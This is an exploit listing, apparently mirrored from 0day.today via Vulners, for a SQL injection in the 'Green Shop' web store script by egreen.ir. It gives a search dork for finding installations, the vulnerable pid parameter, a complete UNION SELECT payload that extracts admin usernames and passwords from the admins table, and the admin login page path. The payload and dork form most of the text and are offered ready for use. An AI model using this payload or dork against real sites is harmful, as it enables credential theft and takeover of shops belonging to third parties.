Green Shop SQL Injection Vulnerabilities

🗓️ 07 Jul 2010 00:00:00Reported by PrinceofHackingType

zdt🔗 0day.today👁 39 Views

Green Shop SQL Injection Vulnerabilities by egreen.ir, SQLi in pid paramete

========================================
Green Shop SQL Injection Vulnerabilities
========================================


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
[x] Tybe: SQL Injection Vulnerabilities
[x] Vendor: egreen.ir
[x] Script Name: Green Shop
[x] author: Ashiyane Digital Security Team
[x] Thanks To N4H
[?] Submit By PrinceofHacking ^_^
[x] Mail : Prince[dot][email protected][dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
D0rk: "egreen.ir"
 
 
Exploit:
http://site.org/index.php?pid=[SQLi]
 
Ex:
http://site.org/index.php?pid=77/**/Union/**/SELECT/**/Group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/admins/**/--
 
Login Page :
http://site.org/admin/login.php
 
 
Special Tnx : All Ashiyane Members



#  0day.today [2018-01-09]  #

07 Jul 2010 00:00Current

7.1High risk

Vulners AI Score7.1